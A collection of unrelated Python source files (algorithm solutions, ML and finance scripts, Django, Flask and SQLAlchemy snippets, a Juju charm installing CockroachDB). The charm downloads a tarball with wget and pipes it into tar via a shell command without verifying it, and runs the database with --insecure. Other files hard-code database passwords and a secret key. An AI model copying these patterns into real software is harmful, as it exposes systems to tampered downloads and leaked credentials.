23,575 | c8930264e6fa9e738e78583962729626763cd723 | # -*- coding:utf-8; -*-
class Solution:
    """Climbing stairs via bottom-up dynamic programming.

    climbStairs(n) follows the Fibonacci recurrence f(n) = f(n-1) + f(n-2),
    computed iteratively in O(n) time and O(1) space.
    """

    def climbStairs(self, n: int) -> int:
        # For n < 3 the answer equals n itself (1 way for 1 step, 2 for 2).
        if n < 3:
            return n
        prev, curr = 1, 2
        for _ in range(2, n):
            prev, curr = curr, prev + curr
        return curr
class Solution:
    """Naive recursive climbing-stairs solution.

    Exponential time; kept as the textbook version that times out on LeetCode.
    """

    def climbStairs(self, n):
        # Base cases: 0/1/2 stairs have n ways (guard also covers n <= 0).
        return n if n < 3 else self.climbStairs(n - 2) + self.climbStairs(n - 1)
|
23,576 | b2092b601beb7f0dc2ab50cb703fcb477b1ad3e3 | import model, nnarchs, zdata, content, utilz, preprocess, extract, report
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
# from torch.utils.data import Dataset, DataLoader
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler, PowerTransformer , OneHotEncoder
from sklearn.linear_model import LogisticRegression
from sklearn import svm
if __name__ == "__main__":
    c = "="  # banner separator character for console output
    report.ZReporter.start("Vessels_Segmentation")
    # Wrap the CHASE-DB fundus listing in the project's dataframe/stats helper.
    pdstats = zdata.PdDataStats(
        {zdata.PdDataStats.DATA_DICT_RECORDZ_KEY: content.CHASEDB_FUNDUS_CONTENT_FPATH,
         zdata.PdDataStats.DATA_DICT_HAS_HEADERZ_KEY: True,
         'rec_parser': utilz.FileIO.row_parser
         },
        ftype=zdata.PdDataStats.TYPE_TXT_LINES_FILE)
    # pdstats.dframe
    ### =============
    X_data = pdstats.dframe
    y_data = pdstats.dframe['i-L/R']  # left/right eye label column
    ### =============== Pipeline
    # load image file --> preproc: equalize hist, --> proc: color channelz,
    ## 1. preprocessing = load, rescale, crop
    preproc_pipe = [('load_file', preprocess.LoadImageFileTransform('fpath', resize=(105, 105), crop_ratio=0.97)), ]
    ## 2. postprocessing = morphological seal, median smooth noise +++ reshape: flatten for SVM etc
    postproc_pipe = []
    ## 3. process permutations = color channels sep (Lab @ ry combo) ||
    color_c_pipe = [('color_channelz', extract.ColorChannelz())]
    data_pipez = [Pipeline(preproc_pipe + color_c_pipe + postproc_pipe)]
    # Candidate models with their grid-search parameter dicts.
    model_pipez = [(Pipeline([('flatten', preprocess.Flattenor()), ('svm', svm.SVC())]), {'kernel': ('linear', 'rbf'), 'C': [1, 10]}),  ##
                   (Pipeline([('flatten', preprocess.Flattenor()), ('logit', LogisticRegression())]), {'C': [1, 10]}),  ##
                   ]
    # print( dpipez)
    mgr = model.ZTrainingManager()
    mgr.build_permutationz(data_pipez=data_pipez, model_pipez=model_pipez)
    # NOTE(review): train_test_split=1. sends everything to training -- confirm intended.
    mgr.run(X_data, y_data, train_test_split=1.)
    print(f"{c*10} End ZTrainingManager {c*10}\n")
|
23,577 | e1d5f674451087336a650998cbc767f8bfdf5fc6 | import subprocess
import hashlib
import os
import pwd
import re

from datetime import timedelta
from time import sleep

from jinja2 import Environment, FileSystemLoader
from ops.charm import CharmEvents
from ops.framework import (
    Object,
    StoredState,
    EventBase,
    EventSource,
)
from ops.model import ModelError
class ClusterInitializedEvent(EventBase):
    """Emitted once the CockroachDB cluster has been initialized.

    Carries the cluster UUID so observers can record it.
    """

    def __init__(self, handle, cluster_id):
        super().__init__(handle)
        self.cluster_id = cluster_id

    def snapshot(self):
        # Persist the cluster id so a deferred event can be re-created later.
        return self.cluster_id

    def restore(self, cluster_id):
        self.cluster_id = cluster_id
class DaemonStartedEvent(EventBase):
    """Emitted when a database daemon is started by the charm.

    Carries no payload.
    """
class DbInstanceManagerEvents(CharmEvents):
    """Custom events emitted by DbInstanceManager."""
    daemon_started = EventSource(DaemonStartedEvent)
    cluster_initialized = EventSource(ClusterInitializedEvent)
class DbInstanceManager(Object):
    """Responsible for managing machine state related to a database instance.

    Installs the CockroachDB binary, renders its systemd unit, starts the
    daemon, and (when appropriate) initializes the cluster, emitting
    ``daemon_started`` / ``cluster_initialized`` events.
    """

    on = DbInstanceManagerEvents()
    _stored = StoredState()

    COCKROACHDB_SERVICE = 'cockroachdb.service'
    SYSTEMD_SERVICE_FILE = f'/etc/systemd/system/{COCKROACHDB_SERVICE}'
    WORKING_DIRECTORY = '/var/lib/cockroach'
    COCKROACH_INSTALL_DIR = '/usr/local/bin'
    COCKROACH_BINARY_PATH = f'{COCKROACH_INSTALL_DIR}/cockroach'
    COCKROACH_USERNAME = 'cockroach'
    MAX_RETRIES = 10
    RETRY_TIMEOUT = timedelta(milliseconds=125)

    def __init__(self, charm, key, is_single_node, cluster):
        """
        :param charm: the parent charm object.
        :param key: framework storage key for this Object.
        :param is_single_node: True when running in single-instance mode.
        :param cluster: peer-relation wrapper providing advertise/peer addresses.
        """
        super().__init__(charm, key)
        self._stored.set_default(is_started=False)
        self._stored.set_default(is_initialized=False)
        self._is_single_node = is_single_node
        self._cluster = cluster

    def install(self):
        """Install the CockroachDB binary and set up its systemd service."""
        self._install_binary()
        self._setup_systemd_service()

    def _install_binary(self):
        """Install CockroachDB from a resource or download a binary."""
        try:
            resource_path = self.model.resources.fetch('cockroach-linux-amd64')
        except ModelError:
            resource_path = None
        if resource_path is None:
            # No resource attached: download the published tarball instead.
            architecture = 'amd64'  # hard-coded until it becomes important
            version = self.model.config['version']
            cmd = (f'wget -qO- https://binaries.cockroachdb.com/'
                   f'cockroach-{version}.linux-{architecture}.tgz'
                   f'| tar -C {self.COCKROACH_INSTALL_DIR} -xvz --wildcards'
                   ' --strip-components 1 --no-anchored "cockroach*/cockroach"')
            subprocess.check_call(cmd, shell=True)
            os.chown(self.COCKROACH_BINARY_PATH, 0, 0)
        else:
            cmd = ['tar', '-C', self.COCKROACH_INSTALL_DIR, '-xv', '--wildcards',
                   '--strip-components', '1', '--no-anchored', 'cockroach*/cockroach',
                   '-zf', str(resource_path)]
            subprocess.check_call(cmd)

    def start(self):
        """Start the CockroachDB daemon.

        Starting the daemon for the first time in the single instance mode also
        initializes the database on-disk state.
        """
        self._run_start()
        self._stored.is_started = True
        if self._is_single_node and not self._stored.is_initialized:
            # Bug fix: was a redundant chained assignment (`a = a = True`).
            self._stored.is_initialized = True
            self.on.cluster_initialized.emit(self._get_cluster_id())
        self.on.daemon_started.emit()

    def _run_start(self):
        subprocess.check_call(['systemctl', 'start', f'{self.COCKROACHDB_SERVICE}'])

    def init_db(self):
        """Initialize the cluster (multi-node mode, leader unit only)."""
        if self._is_single_node:
            raise RuntimeError('tried to initialize a database in a single unit mode')
        elif not self.model.unit.is_leader():
            raise RuntimeError('tried to initialize a database as a minion')
        self._run_init()
        self.on.cluster_initialized.emit(self._get_cluster_id())

    def _run_init(self):
        subprocess.check_call([self.COCKROACH_BINARY_PATH, 'init', '--insecure'])

    def reconfigure(self):
        # TODO: handle real changes here like changing the replication factors via cockroach sql
        # TODO: emit daemon_started when a database is restarted.
        self._setup_systemd_service()

    @property
    def is_started(self):
        """Whether the daemon has been started by this charm."""
        return self._stored.is_started

    def _get_cluster_id(self):
        """Poll `cockroach debug gossip-values` until the cluster UUID appears."""
        out = None
        for _ in range(self.MAX_RETRIES):
            res = subprocess.run([self.COCKROACH_BINARY_PATH, 'debug', 'gossip-values',
                                  '--insecure'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            if not res.returncode:
                out = res.stdout.decode('utf-8')
                break
            elif not re.findall(r'code = Unavailable desc = node waiting for init',
                                res.stderr.decode('utf-8')):
                raise RuntimeError(
                    'unexpected error returned while trying to obtain gossip-values')
            sleep(self.RETRY_TIMEOUT.total_seconds())
        if out is None:
            # Bug fix: previously fell through to a NameError on `out` when
            # every retry hit the "waiting for init" condition.
            raise RuntimeError('timed out waiting for gossip-values to become available')
        cluster_id_regex = re.compile(r'"cluster-id": (?P<uuid>[0-9a-fA-F]{8}\-[0-9a-fA-F]'
                                      r'{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12})$')
        for line in out.split('\n'):
            m = cluster_id_regex.match(line)
            if m:
                return m.group('uuid')
        raise RuntimeError('could not find cluster-id in the gossip-values output')

    def _setup_systemd_service(self):
        """Render the systemd unit, create the service user and (re)start."""
        if self._is_single_node:
            # start-single-node will set replication factors for all zones to 1.
            # Bug fix: the second fragment was missing its f-prefix, so the
            # literal text "{self._cluster.advertise_addr}" ended up in the unit.
            exec_start_line = (f'ExecStart={self.COCKROACH_BINARY_PATH} start-single-node'
                               f' --advertise-addr {self._cluster.advertise_addr} --insecure')
        else:
            peer_addresses = [self._cluster.advertise_addr]
            if self._cluster.is_joined:
                peer_addresses.extend(self._cluster.peer_addresses)
            join_addresses = ','.join([str(a) for a in peer_addresses])
            # --insecure until the charm gets CA setup support figured out.
            exec_start_line = (f'ExecStart={self.COCKROACH_BINARY_PATH} start --insecure '
                               f'--advertise-addr={self._cluster.advertise_addr} '
                               f'--join={join_addresses}')
        ctxt = {
            'working_directory': self.WORKING_DIRECTORY,
            'exec_start_line': exec_start_line,
        }
        env = Environment(loader=FileSystemLoader('templates'))
        template = env.get_template('cockroachdb.service')
        rendered_content = template.render(ctxt)
        # Bug fix: use a stable digest instead of hash(). Python 3 salts str
        # hashes per process, so the stored value never matched across charm
        # invocations and the unit was rewritten (and daemon-reloaded) every time.
        content_hash = hashlib.sha256(rendered_content.encode('utf-8')).hexdigest()
        # TODO: read the rendered file instead to account for any manual edits.
        old_hash = getattr(self._stored, 'rendered_content_hash', None)
        if old_hash is None or old_hash != content_hash:
            self._stored.rendered_content_hash = content_hash
            with open(self.SYSTEMD_SERVICE_FILE, 'wb') as f:
                f.write(rendered_content.encode('utf-8'))
            subprocess.check_call(['systemctl', 'daemon-reload'])
        try:
            pwd.getpwnam(self.COCKROACH_USERNAME)
        except KeyError:
            # First run on this machine: create the service account.
            subprocess.check_call(['useradd',
                                   '-m',
                                   '--home-dir',
                                   self.WORKING_DIRECTORY,
                                   '--shell',
                                   '/usr/sbin/nologin',
                                   self.COCKROACH_USERNAME])
        if self._stored.is_started:
            subprocess.check_call(['systemctl', 'restart', f'{self.COCKROACHDB_SERVICE}'])
|
23,578 | f82333dc50b7758b0d8128bc3f8b31d74544bc9a | from django.urls import path
from django.conf.urls import url
from . import views
# URL namespace for the booket app: reverse as 'booket:<name>'.
app_name = 'booket'

urlpatterns = [
    url(r'^index/', views.index, name='index'),
    url(r'^book_name/', views.book_name, name='book_name'),
    url(r'^author/', views.author, name='author'),
    # NOTE(review): the view name `type` shadows the builtin in views.py.
    url(r'^type/', views.type, name='type'),
    url(r'^add/', views.add, name='add'),
    # Detail pages capture the numeric primary key as `b_id` / `h_id`.
    url(r'^detail/(?P<b_id>\d+)/', views.detail, name='detail'),
    url(r'^hero_detail/(?P<h_id>\d+)/', views.hero_detail, name='hero_detail'),
    url(r'^add_hero/(?P<b_id>\d+)/', views.add_hero, name='add_hero'),
    url(r'^update/', views.update, name='update'),
    # url(r'^test/',Test.Views(),name='uprdate'),
]
23,579 | b7b16bec80e0138895b7cda0560545a78a94155b | #
# ImageViewPil.py -- a backend for Ginga using Python Imaging Library
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
from ginga import ImageView
from . import PilHelp # noqa
from .CanvasRenderPil import CanvasRenderer
class ImageViewPilError(ImageView.ImageViewError):
    """Error raised by the PIL image-view backend."""
    pass
class ImageViewPil(ImageView.ImageViewBase):
    """Ginga image-viewer backend that renders into a PIL surface."""

    def __init__(self, logger=None, rgbmap=None, settings=None):
        ImageView.ImageViewBase.__init__(self, logger=logger,
                                         rgbmap=rgbmap,
                                         settings=settings)

        # NOTE: pillow needs an RGB image in order to draw with alpha
        # blending, not RGBA
        self.rgb_order = 'RGB'

        self.renderer = CanvasRenderer(self)

    def get_surface(self):
        """Return the renderer's backing PIL surface."""
        return self.renderer.surface

    def configure_surface(self, width, height):
        """Resize the render surface and propagate the new window size."""
        self.renderer.resize((width, height))

        # inform the base class about the actual window size
        self.configure(width, height)

    def get_image_as_array(self):
        """Return the rendered surface as an array in `self.rgb_order` order."""
        return self.renderer.get_surface_as_array(order=self.rgb_order)

    def get_rgb_image_as_buffer(self, output=None, format='png', quality=90):
        """Encode the surface into `output` (or a new buffer) in `format`."""
        return self.renderer.get_surface_as_rgb_format_buffer(
            output=output, format=format, quality=quality)

    def get_rgb_image_as_bytes(self, format='png', quality=90):
        """Return the surface encoded as bytes in `format`."""
        return self.renderer.get_surface_as_rgb_format_bytes(
            format=format, quality=quality)

    def update_image(self):
        # subclass implements this method to actually update a widget
        # from the PIL surface
        self.logger.warning("Subclass should override this method")
        return False

    def set_cursor(self, cursor):
        # subclass implements this method to actually set a defined
        # cursor on a widget
        self.logger.warning("Subclass should override this method")

    def reschedule_redraw(self, time_sec):
        # subclass implements this method to call delayed_redraw() after
        # time_sec; this base version redraws immediately.
        self.delayed_redraw()
class CanvasView(ImageViewPil):
    """This class is defined to provide a non-event handling invisible
    viewer.
    """

    def __init__(self, logger=None, settings=None, rgbmap=None,
                 bindmap=None, bindings=None):
        ImageViewPil.__init__(self, logger=logger, settings=settings,
                              rgbmap=rgbmap)
        # No widget behind this viewer, so redraws need not be deferred.
        self.defer_redraw = False

        # Needed for UIMixin to propagate events correctly
        self.objects = [self.private_canvas]

    def set_canvas(self, canvas, private_canvas=None):
        """Install `canvas` and keep the event-propagation list in sync."""
        super(CanvasView, self).set_canvas(canvas,
                                           private_canvas=private_canvas)
        self.objects[0] = self.private_canvas

    def update_image(self):
        # no widget to update
        pass

    def configure_window(self, width, height):
        """Alias for configure_surface (there is no real window)."""
        return super(CanvasView, self).configure_surface(width, height)
# END
|
23,580 | 8f61071d32b8941a6bf601f736522cb1f466466d | from sqlalchemy import Table, MetaData, Column, Integer, String
from sqlalchemy.orm import mapper
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from sqlalchemy import Sequence
from sqlalchemy import ForeignKey
from sqlalchemy.orm import relationship, backref
from sqlalchemy.ext.declarative import declarative_base
# NOTE(review): credentials are hard-coded; move to config/env vars in real use.
engine = create_engine('mysql://root:123@localhost:3306/yy')
# metadata = MetaData()
from sqlalchemy import Column, Integer, String
from sqlalchemy import ForeignKey
from sqlalchemy.orm import relationship, backref
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class User(Base):
    """ORM model for the ``users`` table (one-to-many with ``Addr``)."""

    __tablename__ = 'users'

    id = Column(Integer, primary_key=True)
    name = Column(String(20))
    fullname = Column(String(20))
    password = Column(String(20))
    # user.addr lists the user's addresses; Addr gains a `users` backref.
    addr = relationship("Addr", backref='users')

    def __repr__(self):
        return f"<User(name='{self.name}', fullname='{self.fullname}', password='{self.password}')>"
class Addr(Base):
    """ORM model for the ``addr`` table; each row belongs to one user."""

    __tablename__ = 'addr'

    id = Column(Integer, primary_key=True)
    email_address = Column(String(20), nullable=False)
    # Foreign key back to the owning users row.
    user_id = Column(Integer, ForeignKey('users.id'))

    def __repr__(self):
        return f"<Address(email_address='{self.email_address}')>"
# Create the users/addr tables (no-op for tables that already exist).
Base.metadata.create_all(engine)
# class Parent(Base):
# __tablename__ = 'parent'
# id = Column(Integer, primary_key=True)
# children = relationship("Child")
# class Child(Base):
# __tablename__ = 'child'
# id = Column(Integer, primary_key=True)
# parent_id = Column(Integer, ForeignKey('parent.id'))
# Base.metadata.create_all(engine)
# class Parent(Base):
# __tablename__ = 'parent'
# id = Column(Integer, primary_key=True)
# child_id = Column(Integer, ForeignKey('child.id'))
# child = relationship("Child")
# class Child(Base):
# __tablename__ = 'child'
# id = Column(Integer, primary_key=True)
# class Parent(Base):
# __tablename__ = 'parent'
# id = Column(Integer, primary_key=True)
# child = relationship("Child", uselist=False, backref="parent")
# class Child(Base):
# __tablename__ = 'child'
# id = Column(Integer, primary_key=True)
# parent_id = Column(Integer, ForeignKey('parent.id'))
# Base.metadata.create_all(engine)
# association_table = Table('association', Base.metadata,
# Column('left_id', Integer, ForeignKey('left.id')),
# Column('right_id', Integer, ForeignKey('right.id'))
# )
# class Parent(Base):
# __tablename__ = 'left'
# id = Column(Integer, primary_key=True)
# children = relationship("Child",
# secondary=association_table)
# class Child(Base):
# __tablename__ = 'right'
# id = Column(Integer, primary_key=True)
# Base.metadata.create_all(engine)
|
23,581 | 2478a0c0b52f4da9d26439bd1fd07115e497f925 | from flask import Flask, render_template,redirect, url_for, request, session
import mysql.connector
# NOTE(review): hard-coded DB credentials and a single module-level connection;
# prefer config/env vars and per-request connections in production.
mydb = mysql.connector.connect(
    host="localhost",
    user="root",
    password="",
    database="raspored"
)

app = Flask(__name__)
app.config['SECRET_KEY'] = 'januar2020'
@app.route('/')
@app.route('/raspored')
def index():
    """Render the timetable plus a teacher/classroom filter list."""
    cursor = mydb.cursor()
    cursor.execute("SELECT * FROM raspored")
    rows = cursor.fetchall()
    # Distinct teachers (column 3) and classrooms (column 7); set() order is arbitrary.
    teachers = list(set(row[3] for row in rows))
    classrooms = list(set(row[7] for row in rows))
    # Pair teachers with classrooms positionally, padding with "" when there
    # are more teachers than classrooms.
    filtered = [
        [teacher, classrooms[i] if i < len(classrooms) else ""]
        for i, teacher in enumerate(teachers)
    ]
    return render_template('index.html', info=rows, filtered=filtered)
if __name__ == '__main__':
    # Development server only; disable debug in production.
    app.run(debug=True)
|
23,582 | fa023d698903a841e7013b824b4ba6c34819edb9 | from virus import Virus
from random import choice, sample, randint
from collections import defaultdict
from numpy.random import normal, binomial
from host import Host
from id_generator import generate_id
import networkx as nx
class Environment(object):
    """
    The Environment class is the second highest level object in the viral
    simulator. Metaphorically, the Environment class can represent a
    geographic location where Host objects interact with each other, and in
    the process, pass viruses from one host to the next.

    In the Environment class, Sampler objects can also interact with Host
    objects, to simulate the process of sampling pathogens from the Host.

    Multiple Environment objects can exist in a particular simulation, allowing
    a host to move from Environment to Environment. This allows one to
    simulate the spread of Viruses from one Environment to another, by means
    of Hosts moving between them.
    """

    def __init__(self, num_hosts=0):
        """Initialize the environment with `num_hosts` freshly created hosts."""
        super(Environment, self).__init__()
        self.current_time = 0
        self.id = generate_id()
        self.hosts = []
        for _ in range(num_hosts):
            self.create_host()

    def __repr__(self):
        return "Environment %s... with %s hosts." % \
            (self.id[0:5], len(self.hosts))

    def create_host(self):
        """Create a new Host bound to this environment and return it.

        Uses the module-level Host import; the redundant per-call imports
        were removed.
        """
        h = Host(self)
        return h

    def add_host(self, host):
        """Add an existing Host object; raises TypeError for anything else."""
        if isinstance(host, Host):
            self.hosts.append(host)
        else:
            raise TypeError('A Host object must be specified!')

    def remove_host(self, host):
        """Remove a host, given either the Host object or its list index."""
        if isinstance(host, Host):
            self.hosts.pop(self.hosts.index(host))
            print('Removing host %s... from environment %s' % (host.id[0:5], self.id[0:5]))
        elif type(host) == int:
            self.hosts.pop(host)
        else:
            raise TypeError('A Host object or an integer must be specified!')

    def infected_hosts(self):
        """Return the hosts currently carrying at least one virus.

        (Bug fix: completed the truncated docstring and stopped shadowing the
        method name with a local variable.)
        """
        return [host for host in self.hosts if len(host.viruses) > 0]

    def uninfected_hosts(self):
        """Return the hosts currently carrying no viruses."""
        return [host for host in self.hosts if len(host.viruses) == 0]

    def naive_hosts(self):
        """Return the hosts that have never been infected."""
        # Idiom fix: `not x` instead of `x == False`.
        return [host for host in self.hosts if not host.was_infected()]
|
23,583 | 21af0348b644fb6176a9ab022cdfad6a2293c43f | #http://www.pythonchallenge.com/pc/def/peak.html
# There is a data file referenced in the page's source code.
# Tips: pickle, load
# Unpickling it draws a picture made of characters.
# It reads: "channel" (the next level's URL).
|
23,584 | 23b84cabbe604c04522d86d9e7640ae852074d04 | import numpy as np
import pandas as pd
import torch
def read_data(file_name):
    """Read a Big5-encoded CSV and return its first column.

    :param file_name: path to the CSV file (pandas' default header handling).
    :return: numpy.ndarray with the first column's values (e.g. sample ids).
    """
    data = pd.read_csv(file_name, encoding="big5")
    # .values drops index/column labels, leaving a plain ndarray.
    data = data.values
    # Cleanup: removed the unused `label_only` flag left over from editing.
    test_x = data[:, 0]
    return test_x
def genLabels_Partition(train_X, train_Y, valid_ratio=0.9):
data_size = len(train_Y)
labels = {train_X[i]: train_Y[i] for i in range(len(train_Y))}
train_ids = [train_X[i] for i in range(int(data_size * (1 - valid_ratio)))]
valid_ids = [
train_X[i]
for i in range(int(data_size * (1 - valid_ratio)), data_size)
]
partition = {'train': train_ids, 'validation': valid_ids}
return labels, partition
# Smoke test: reads the test set from the expected data directory on import.
read_data('./data/test.csv')
|
23,585 | 621838cab365aff494bbf5329194f90a12857943 | '''
8.19.6
Print a neat looking multiplication table like this:
1 2 3 4 5 6 7 8 9 10 11 12
:--------------------------------------------------
1: 1 2 3 4 5 6 7 8 9 10 11 12
2: 2 4 6 8 10 12 14 16 18 20 22 24
3: 3 6 9 12 15 18 21 24 27 30 33 36
4: 4 8 12 16 20 24 28 32 36 40 44 48
5: 5 10 15 20 25 30 35 40 45 50 55 60
6: 6 12 18 24 30 36 42 48 54 60 66 72
7: 7 14 21 28 35 42 49 56 63 70 77 84
8: 8 16 24 32 40 48 56 64 72 80 88 96
9: 9 18 27 36 45 54 63 72 81 90 99 108
10: 10 20 30 40 50 60 70 80 90 100 110 120
11: 11 22 33 44 55 66 77 88 99 110 121 132
12: 12 24 36 48 60 72 84 96 108 120 132 144
'''
def mutiplication_table():
    """Print a neatly aligned 12x12 multiplication table.

    Columns 1-9 are 3 characters wide, 10-12 are 4 wide; each row is labelled
    with its multiplier followed by a colon.
    """
    layout = "{0:>3}: {1:>3} {2:>3} {3:>3} {4:>3} {5:>3} {6:>3} {7:>3} {8:>3} {9:>4} {10:>4} {11:>4} {12:>4}"
    header = "{0:>3} {1:>3} {2:>3} {3:>3} {4:>3} {5:>3} {6:>3} {7:>3} {8:>3} {9:>4} {10:>4} {11:>4} {12:>4}"
    print(header.format("", *range(1, 13)))
    # Separator under the header row.
    print(" :" + ("-" * 54))
    for row in range(1, 13):
        print(layout.format(row, *(row * col for col in range(1, 13))))


mutiplication_table()
def get_seat_id(bp):
    """Decode a boarding pass like 'FBFBBFFRLR' into its seat id.

    F/L select the lower half and B/R the upper half of a binary partition,
    so the pass is simply a 10-bit binary number -- and since the seat id is
    row * 8 + column, the full 10-bit value IS the seat id. This replaces the
    original's two hand-rolled partition loops with a direct base-2 decode.
    """
    return int(bp.translate(str.maketrans("FBLR", "0101")), 2)
def part_1():
    """Return the highest seat id found in 5_input.txt."""
    # Bug fix: use a context manager so the file handle is closed; the
    # original also shadowed the `input` builtin and built a throwaway list.
    with open('5_input.txt', 'r') as fh:
        return max(get_seat_id(line.strip()) for line in fh)
def part_2():
    """Return the missing seat id (the single gap in the contiguous range)."""
    min_id, max_id, sum_ids = 1023, 0, 0
    # Bug fix: context manager closes the file; `input` builtin no longer shadowed.
    with open('5_input.txt', 'r') as fh:
        for line in fh:
            seat_id = get_seat_id(line.strip())
            min_id = min(seat_id, min_id)
            max_id = max(seat_id, max_id)
            sum_ids += seat_id
    # Sum of the full arithmetic series minus the observed sum = missing id.
    # `/ 2` (float) kept to preserve the original return type.
    expected_sum = (max_id - min_id + 1) * (max_id + min_id) / 2
    return expected_sum - sum_ids
|
23,587 | acd289b6d8717ab23089f97ffda2c0068aec7b48 | import flag
import project
from time import sleep
import easylevel
import mediumlevel
import hardlevel
# This is the function that controls the end of the easy level
def end_easy_game():
    """Play the easy-level ending: congratulations, a guessing teaser, and an
    optional replay of the questions asked."""
    print("\nCongratulations! You made it to the end of the game!\n")
    sleep(2)
    print("I hope you didn't google the answers ;)\n")
    sleep(1)
    print("Now, how about a small guessing game?\n")
    sleep(2)
    print("Which classical animation is based off of\nThe Big Five wild animals?")
    sleep(3)
    print("\nHere's a hint...\n")
    print(flag.lion)  # ASCII art from the flag module
    print("HAKUNA MATATA!")
    sleep(2)
    print("Would you like to see the questions asked?")
    equestion_print = str(input("y or n :"))
    if equestion_print == "y":
        easylevel.easy_questions_print()
    elif equestion_print == "n":
        print("Okay. Goodbye!")
    else:
        # Any other answer ends the function silently.
        return
# This is a function that controls the end of the medium level
def end_medium_game():
    """Play the medium-level ending: congratulations, a pyramid-drawing
    guessing teaser, and an optional replay of the questions asked."""
    print("\nCongratulations! You made it to the end of the game!\n")
    sleep(2)
    print("I hope you didn't google the answers ;)\n")
    sleep(1)
    print("Please take the time to play the other levels for more African facts")
    sleep(3)
    print("Now, how about a small guessing game?\n")
    sleep(2)
    print("Guess the Wonder of the World\nLocated in the North Eastern part of Africa?\n")
    sleep(3)
    print("Here's a hint...\n")
    sleep(1)
    # Print a 15-row centered star pyramid as the hint.
    size = 15
    m = (2 * size) - 2
    for i in range(0, size):
        for j in range(0, m):
            print(end=" ")
        m = m - 1
        for j in range(0, i + 1):
            print("* ", end=' ')
        print(" ")
    sleep(3)
    print("\nI hope you enjoyed the game :)\nGoodbye!")
    sleep(2)
    print("Would you like to see the questions asked?")
    mquestion_print = str(input("y or n :"))
    if mquestion_print == "y":
        mediumlevel.medium_questions_print()
    elif mquestion_print == "n":
        print("Okay. Goodbye!")
    else:
        # Any other answer ends the function silently.
        return
# This is the function that controls the end of the hard level
def end_hard_game():
    """Play the hard-level ending: congratulations, ASCII-art rewards, a
    guessing teaser, and an optional replay of the questions asked."""
    print("\nCongratulations! You made it to the end of the game!\n")
    sleep(2)
    print("I hope you didn't google the answers ;)\n")
    sleep(2)
    print("For your guts and apparent knowledge ;) of Africa,\n")
    sleep(1)
    print("Here's an ASCII Art poster of the lovely continent")
    sleep(4)
    print(flag.conti)  # ASCII art of the African continent
    sleep(2)
    print("Karibu AFRICA!\n\nHAKUNA MATATA!")
    sleep(2)
    print("Oh wait...\n\nThere's more...\n\n")
    sleep(2)
    print("How about a small guessing game?\n")
    sleep(3)
    print("Which is the popular tribe in Kenya\nKnown for their tapestry and ability to jump over 10 feet high?")
    sleep(3)
    print("Here's a hint...\n")
    sleep(2)
    print(flag.maasai)  # ASCII art hint
    sleep(2)
    print("Would you like to see the questions asked?")
    hquestion_print = str(input("y or n :"))
    if hquestion_print == "y":
        hardlevel.hard_questions_print()
    elif hquestion_print == "n":
        print("Okay. Goodbye!")
    else:
        # Any other answer ends the function silently.
        return
# I used this function to determine the most appropriate height and width of the test_pyramid
# by changing the value of the size variable
'''def test_pyramid():
size = 15
m = (2 * size) - 2
for i in range(0, size):
for j in range(0, m):
print(end=" ")
m = m - 1
for j in range(0, i + 1):
print("* ", end=' ')
print(" ")'''
if __name__ == '__main__':
    # This is non-essential for running of the game
    # It was just for testing purposes
    # print(flag.lion)
    end_hard_game()
    # test_pyramid()
|
23,588 | 2db284f3d73188d0b4d91f6f6a4a8abc95303d75 | import pandas as pd
import statsmodels.api as sm
import matplotlib.pyplot as plt
# %是jupyter notebook的魔法命令
# % matplotlib inline
# 正常显示画图时出现的中文和负号
from pylab import mpl
# Configure matplotlib so Chinese labels and minus signs render correctly.
mpl.rcParams['font.sans-serif'] = ['SimHei']
mpl.rcParams['axes.unicode_minus'] = False
# Fetch Shanghai Composite Index ('sh') daily bars via tushare.
import tushare as ts

df = ts.get_k_data('sh', start='2000-01-01', end='2020-06-16')
df.index = pd.to_datetime(df.date)
df.head()
# Weekly returns of the index.
df_ret = df.close.resample('W').last().pct_change().dropna()
df_ret.plot(title='上证综指周收益率', figsize=(15, 4))
# plt.show()
# Stationarity check: ADF unit-root test from the arch package.
from arch.unitroot import ADF

adf = ADF(df_ret)
print(adf)
# Fit a 3-regime Markov switching model with regime-dependent variance.
mod = sm.tsa.MarkovRegression(df_ret.dropna(),
                              k_regimes=3, trend='nc', switching_variance=True)
res = mod.fit()
res.summary()
# Plot the smoothed probability of each volatility regime (low/mid/high).
fig, axes = plt.subplots(3, figsize=(12, 8))
ax = axes[0]
ax.plot(res.smoothed_marginal_probabilities[0])
ax.set(title='上证综指低波动平滑概率图')
ax = axes[1]
ax.plot(res.smoothed_marginal_probabilities[1])
ax.set(title='上证综指中波动平滑概率图')
ax = axes[2]
ax.plot(res.smoothed_marginal_probabilities[2])
ax.set(title='上证综指高波动平滑概率图')
# fig.tight_layout()
def plot_rsm(code, title, start='2010-01-01', end='2020-06-17'):
    """Fit a 3-regime Markov switching model to a stock's weekly returns and
    plot the smoothed regime probabilities.

    :param code: tushare stock code, e.g. '002400'.
    :param title: title prefix for the subplots (Chinese labels expected).
    :param start, end: date range passed to tushare.
    """
    df = ts.get_k_data(code, start=start, end=end)
    df.index = pd.to_datetime(df.date)
    df_ret = df.close.resample('w').last().pct_change().dropna()
    # Fit the model.
    print("df_ret.dropna()", df_ret.dropna())
    mod = sm.tsa.MarkovRegression(df_ret.dropna(), k_regimes=3, trend='nc', switching_variance=True)
    res = mod.fit()
    print(res.predicted_marginal_probabilities)
    print(res.smoothed_marginal_probabilities)
    print(res.predict())
    # NOTE(review): 4 axes are allocated but only 3 are used; the 4th row
    # stays empty (see the commented-out axes[3] below).
    fig, axes = plt.subplots(4, figsize=(12, 8))
    ax = axes[0]
    ax.plot(res.smoothed_marginal_probabilities[0])
    ax.set(title=title + '低波动平滑概率图')
    ax = axes[1]
    ax.plot(res.smoothed_marginal_probabilities[1])
    ax.set(title=title + '中波动平滑概率图')
    ax = axes[2]
    ax.plot(res.smoothed_marginal_probabilities[2])
    ax.set(title=title + '高波动平滑概率图')
    # fig.tight_layout()
    # ax = axes[3]
    # a
# Run for stock 002400 (省广集团) and display the figures.
plot_rsm('002400', '省广集团')
plt.show()
|
23,589 | c93fbc448f368332771905b249c586fdf08e4ca2 | #!/usr/bin/python
# -*-coding:utf-8-*-
